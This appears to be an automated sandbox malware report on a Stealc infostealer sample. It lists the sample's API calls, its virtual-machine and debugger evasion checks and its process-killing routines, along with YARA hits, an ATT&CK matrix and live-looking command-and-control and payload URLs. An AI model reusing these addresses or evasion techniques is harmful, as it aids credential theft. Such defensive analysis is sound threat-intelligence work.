Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E1820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_024E1820
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024FD8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024FD8A7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024FE0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	1_2_024FE0B7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F5127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024F5127
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024FE597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_024FE597

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Code function: 1_2_025033F7 GetSystemInfo,wsprintfA,

1_2_025033F7

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: EbXj93v3bO.exe, 00000000.00000003.3973809946.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000002.4104123637.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000002.4104042271.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973913564.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BB02.tmp.exe, 00000001.00000002.2071390992.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwares0
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: BB02.tmp.exe, 00000001.00000002.2071390992.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Code function: 1_2_00404980 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,

1_2_00404980

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Code function: 1_2_00404980 VirtualProtect 00000000,00000004,00000100,?

1_2_00404980

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00B3E513 push dword ptr fs:[00000030h]	0_2_00B3E513
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_025400C6 mov eax, dword ptr fs:[00000030h]	0_2_025400C6
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0251092B mov eax, dword ptr fs:[00000030h]	0_2_0251092B
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02510D90 mov eax, dword ptr fs:[00000030h]	0_2_02510D90
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_004263C0 mov eax, dword ptr fs:[00000030h]	1_2_004263C0
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00A1CD1B push dword ptr fs:[00000030h]	1_2_00A1CD1B
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_02506627 mov eax, dword ptr fs:[00000030h]	1_2_02506627
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E092B mov eax, dword ptr fs:[00000030h]	1_2_024E092B
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E0D90 mov eax, dword ptr fs:[00000030h]	1_2_024E0D90

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0253A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0253A63A
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0252073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0252073A
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0251FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0251FB78
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_025208CD SetUnhandledExceptionFilter,	0_2_025208CD
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_02509A10 SetUnhandledExceptionFilter,	1_2_02509A10
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_02507E31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_02507E31
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_0250784F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0250784F

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: BB02.tmp.exe PID: 7928, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	1_2_004246C0
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_02504897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,	1_2_02504897
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_02504927 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	1_2_02504927

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Process created: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe "C:\Users\user\AppData\Local\Temp\BB02.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0254B271
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: EnumSystemLocalesW,	0_2_02545034
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetLocaleInfoW,	0_2_02545427
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: EnumSystemLocalesW,	0_2_0254B4E9
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: EnumSystemLocalesW,	0_2_0254B534
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: EnumSystemLocalesW,	0_2_0254B5CF
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetLocaleInfoW,	0_2_0254BADC
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0254BBA9
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetLocaleInfoW,	0_2_0254B8AC
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0254B9D5
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_02502F67

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Code function: 1_2_004229E0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_004229E0

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Code function: 1_2_02502E17 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

1_2_02502E17

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 1.3.BB02.tmp.exe.2520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BB02.tmp.exe.24e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BB02.tmp.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BB02.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BB02.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1744504522.0000000002520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BB02.tmp.exe PID: 7928, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 1.3.BB02.tmp.exe.2520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BB02.tmp.exe.24e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BB02.tmp.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BB02.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BB02.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1744504522.0000000002520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BB02.tmp.exe PID: 7928, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02531B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_02531B33
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02530E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_02530E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 Create Account	111 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	3 Clipboard Data	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	2 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	44 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
EbXj93v3bO.exe	42%	ReversingLabs	Win32.Spyware.Stealc
EbXj93v3bO.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://176.113.115.19/ScreenUpdateSync.exe6	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exev	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.phplL	100%	Avira URL Cloud	malware
http://92.255.57.89/697b92cb4e247842/sqlite3.dllv	100%	Avira URL Cloud	malware
http://92.255.57.89/lw	100%	Avira URL Cloud	malware
http://92.255.57.89/45c616e921a794b8.php	100%	Avira URL Cloud	malware
http://92.255.57.89smss.exe	0%	Avira URL Cloud	safe
http://92.255.57.89/697b92cb4e247842/sqlite3.dllll	100%	Avira URL Cloud	malware
http://92.255.57.89	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.phpwininit.exe	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exex	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.php4	100%	Avira URL Cloud	malware
http://92.255.57.89/45c616e921a794b8.php658(v	100%	Avira URL Cloud	malware
http://92.255.57.89A	0%	Avira URL Cloud	safe
http://92.255.57.89FIECBG	0%	Avira URL Cloud	safe
http://92.255.57.89/	100%	Avira URL Cloud	malware
http://92.255.57.89/697b92cb4e247842/sqlite3.dll	100%	Avira URL Cloud	malware
http://176.113.115.19/	0%	Avira URL Cloud	safe
http://92.255.57.89:	0%	Avira URL Cloud	safe
http://92.255.57.89/45c616e921a794b8.phpl	100%	Avira URL Cloud	malware
http://92.255.57.89/ew	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	172.67.179.207	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://92.255.57.89/45c616e921a794b8.php	true	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false		high
http://92.255.57.89/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE	EbXj93v3bO.exe, 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
http://92.255.57.89	BB02.tmp.exe, 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmp, BB02.tmp.exe, 00000001.00000002.2071351064.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, BB02.tmp.exe, 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmp, BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://92.255.57.89/lw	BB02.tmp.exe, 00000001.00000002.2071410267.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://92.255.57.89smss.exe	BB02.tmp.exe, 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exe6	EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973809946.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000002.4104153786.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, EbXj93v3bO.exe, 00000000.00000003.3973871075.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exev	EbXj93v3bO.exe, 00000000.00000003.1721342973.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
